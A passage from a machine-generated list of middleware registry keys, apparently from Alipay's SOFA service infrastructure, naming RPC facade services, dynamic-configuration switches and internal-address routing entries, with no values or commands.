FAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.128.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprovisioncore.common.facade.project.WorkspaceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dt.onedata3.model.service.ValidateService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifymng.revolmng.service.facade.TenantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.generalorder.SignViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.text.api.SecuTextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_DWDIS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.activity.facade.signup.SignUpReceiptServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetpreference.api.facade.HotInfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.184.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insrenewprod.common.service.facade.api.repayment.InsRepaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExStandardProductRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.orgdecision.InstBizInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcdatalab.common.service.facade.service.DxDeployChannelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcplan.common.service.facade.api.PlanExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:cfmng-pmcCallBackServiceUniqueId-yufuhui@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.dttrans.api.DebittransCacheConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.changecode.MngChangeCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.activity.GroupActivityQueryClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryInstItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.doc.TrackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.updateSwitchV2On,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icertifycore.service.facade.api.CertifyValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmQuotaDataQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insclaimbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.PartnerLoginVerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.dependence.DependenceOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.biz.dapply.device.manager.ReassignReactManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CifPasswordVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.72.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ilimitcenter.service.facade.api.LimitCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.mng.MktProdAppDiscountCouponConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.integration.mobileic.VerifyFlowFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.meta.ServiceMetaTemplateQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.FrdspcoreCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.data.conf.interfaces.facade.IConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.taobao.film.tfinteraction.api.BlockChainTrAPI:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.taskResendIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:ibizopenprod_openapi_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isasp.service.facade.psbp.InsuranceInstitutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BIYUAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.campaign.mng.CampaignManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.secondaryBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.102.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.client.serivce.ExterfaceInvokeService:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDeposit2_SysCallback2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.scheduler.TaskProgressQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:financeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.engine.config.RuleEngineResource.enableRuleAnalyzerTaskLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.biz.odps.OdpsOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.MerchantPassNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.MerchantInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:ZAXHBXCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.tradeapcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.api.blacklist.DishBlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mosn-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.acControlParamConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.qaZQueue26#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopItemAlignCompetitorAuditFinishPublisher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.metadata.api.MetadataScriptBundleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileprod.facade.ImgUrlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.etetestcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.pcard.VcpCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antreplay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsettle.biz.service.common.test.TestSchedulerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.task.service.GardenerTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:mobilesearch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wall.common.service.PolicyCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.53.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilelbs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.DistributedLockService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.CurrencyUtilFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.service.model.MdpModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:custcenterprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.privacyquestion.UnifyPrivacyQuestionCheckService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.obSelfCurePush,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.common.service.facade.api.MerchantGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.bizLocateExportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.dchain.common.facade.api.comparam.InstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.voucher.VoucherNonPaymentConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.SocialActivityCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.qrcode.QrCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.cache.service.CacheLoadQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.DonateItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openpunish@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.PermissionFacade:1.0:orgPermissionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.PortfolioQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recadmin.dmp.common.service.facade.api.CircleManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:pcardsales@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fininsightmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.128.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.zcache.log.finfocore.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicore.common.service.facade.gray.api.AppCustomGrayOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainmessage.impl.FraudFeedBackWordingSwitchImpl.complainWording,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:prodtransquery@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.4.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insxhbprod.common.service.facade.GuardianGoldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.NameListSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.AntTargetManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINQA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dms.common.service.LogCallbackService:1.0:internal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.ApplyOrderQueryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.148.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ngfesync.facade.feature.DaasTagFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.tenant.client.biz.service.ProducerUserService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoplaycenter.common.team.facade.api.RelationRecordCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.secretToken,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.116.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.common.AssetOperateRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_BKIBDEPOSIT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yqdataservice.common.service.facade.weibo.WeiboUidServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.todo.api.FinTodoListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.promo.UserVisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.hahaTest:name=com.alipay.tutorial.msgbroker.drm.DrmDemo.age,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aliminiabilityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.DataDictionaryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.biz.shared.stub.MessageStubFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-contentlib-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.activity.ActivityRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MVCDEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.dttrans.api.DebittransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.craftsman.CraftsmanOpusManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.DepartmentManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.203.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finasmcore.common.service.facade.allocation.AstAllocTaskDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.fcprocess.AntprocessFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.190.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsecurity.common.service.facade.fullscene.QuerySceneInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.bianshen.JycmBianShenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.useOverAllIdempotent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstrategy.common.service.facade.portfolio.PortfolioTradeDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lyncas.rpc.facade.SearchFacade:1.0:unimetasvccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autodqc.D2DqcRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.SchemaConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@policybench#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.censor:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.admin.EtcApplyOrderAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.autoaccess.EbppBatchTaskInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.client.service.InsGatewayExterfaceInvokeService:1.0:insclaimportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.report.common.service.facade.api.funnel.FunnelReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_submit2ReviewProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.SystemParamMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.index.banner.IndexBannerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.exratecenterTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.account.service.MYBKDepositAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingLogRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.UserService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.48.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrexcashier.web.frame.viewmodel.service.ViewModelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.api.loadtest.PayPlusLoadTestFacade:1.0:loadTest4DaemonFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.ad.PromoAdSpaceMangerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_COOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:insurance_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaTodayRiskTargetDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ContentTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.CloudAcceptSysFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.cluster.ClusterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTTicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.secretcard.api.SecretCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fpdecision.platform.common.service.facade.iface.OfflineSyncFacade:1.0:stableOfflineSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.activity.api.ActivityTaskFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.ebppgw.facade.callback.IndustrygwMessageBizProcessCallback:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_B_TRADE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-wowtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_JSS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.QueryServiceFacade:1.0:uiweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.opscore.common.event.EventReceiver:1.0:SasEventReceiver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.CollectionMdmMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_WKPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.vein.winbillboard.common.service.facade.graph.FullDataQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S_antwatch_timer#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.198.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findefencecore.core.service.common.BucService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.f